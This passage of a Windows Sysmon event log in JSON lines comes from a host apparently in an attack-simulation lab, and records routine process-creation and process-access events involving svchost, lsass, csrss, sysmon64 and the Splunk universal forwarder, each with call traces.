C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.491\r\nProcessGuid: {41C8662E-1F7E-5F25-0000-0010991F0400}\r\nProcessId: 3808\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.491","ProcessGuid":"{41C8662E-1F7E-5F25-0000-0010991F0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7E-5F25-0000-0010991F0400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7E-5F25-0000-0010991F0400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7E-5F25-0000-0010991F0400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7E-5F25-0000-0010991F0400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:34.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:34.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 